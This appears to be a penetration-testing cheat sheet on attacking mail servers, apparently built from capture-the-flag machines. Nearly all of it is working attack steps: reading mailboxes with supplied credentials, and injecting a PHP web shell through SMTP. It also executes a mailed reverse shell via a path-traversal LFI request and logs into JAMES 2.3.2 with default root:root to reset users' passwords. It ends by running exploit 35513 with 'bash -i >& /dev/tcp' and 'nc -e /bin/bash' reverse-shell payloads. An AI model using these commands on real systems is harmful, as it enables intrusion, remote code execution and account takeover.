Email SMTP
Read emails
telnet 10.x.x.x 110
nc -nv 10.x.x.x 110
USER mindy
PASS hello
STAT
RETR 2
+OK Message follows
Delivered-To: mindy@localhost
Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access
Dear Mindy,
Here is your password.. blah blah blah
Send email with telnet
SMTP: 25
Bonus: Inject a php exploit.. you will need an LFI to read/execute it though
REF: PBX-PhpEmailExploit
telnet $IP 25
EHLO beep.htb ..Any hello will work
VRFY hacked@localhost ..rejected
VRFY asterisk@localhost ..Verified
mail from:[email protected]
rcpt to:askerisk@localhost ..Same as Verified
data ..Begin Email
Subject:Testing!
Hello ..test #1
<?php echo "Php success"; ?> ..test #2
<?php echo system($_REQUEST['command']); ?> ..test #3
. ..to end the email
quit
sendmail with attachment
Instead of telnet, EHLO, blah blah...
Send a Reverse shell php
> sendmail -t asterisk@localhost -o message-file=php-reverse-shell.php -u pwnd -s $IP:25 -f [email protected]
execute and connect
LFI Execution Example (for after you've sent the evil email)
> nc -nvlp 4444
> https://$IP/vtigercrm/graph.php?current_language=../../../../../../../../var/spool/mail/asterisk%00&module=Accounts&action
.. graph.php?lang=../../../var/mail/asterisk%00&module=Accounts&command=whoami HTTP/1.1
.. graph.php?lang=../../../var/mail/asterisk%00&module=Accounts&command=bash -i >& /dev/tcp/$IP/4444 0>&1 HTTP/1.1
|
Goal
Files
cat /var/mail/askerisk
Thunderbird
If you have a user/pass, you can open thunderbird to browser emails
You might find a password that you could use for SSH too!! REF: solidstateHTB
thunderbird
create new account: email
mindy@$10.x.x.x
password
read emails
James Server 2.3.2
Java Apache Mail Enterprise Server (JAMES)
Open source SMTP and POP3 mail transfer agent and NNTP news server
Default Login: root:root
Connect and Reset user-email password
Then use Thunderbird email to look for clues
nmap -p- 10.x.x.x
PORT STATE SERVICE
25/tcp open smtp ..mail server will be present too
110/tcp open pop3 ..mail component
119/tcp open nntp ..not sure this is related
4555/tcp open rsip ..JAMES connect port for admin tool!!
nc $IP 4555 ..telnet works too
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
admin:admin ..fail
root:root ..ok
help
listusers
setpassword admin password
setpassword mindy password ..will update a user's email password
James Server Exploit 2.3.2 (RCE)
35513 will get you a full-shell
Requirements:
Default login: root/root
Must have a working ssh login user/pass (limited is ok)
Need to update the payload for reverse-connect
Will add a weird user account: ../../../etc/bash_completion.d
Sends email to our 'weird' user-directory
When anybody logs into ssh, we will get execution
Confused?
Yes, you need an ssh login already.. but if its limited it wont do much
This will get you a full-shell, instead of a limited
Next step is to look for PrivEsc !!
searchsploit james
searchsploit -m linux/remote/35513.py
vim 35513.py
payload = 'bash -i >& /dev/tcp/$MyIP/4444 0>&1'
payload = 'nc -e /bin/bash $MyIP 4444 &' ..optional
python 35513.py $IP
python2.7 ./35513.py 10.x.x.x
[+]Connecting to James Remote Administration Tool...
[+]Creating user...
[+]Connecting to James SMTP server...
[+]Sending payload...
[+]Done! Payload will be executed once somebody logs in.
ssh user@server ..will pop the exploit
nc -nvlp 4444 ..listen
connected ..with full shell
More
Last updated
Was this helpful?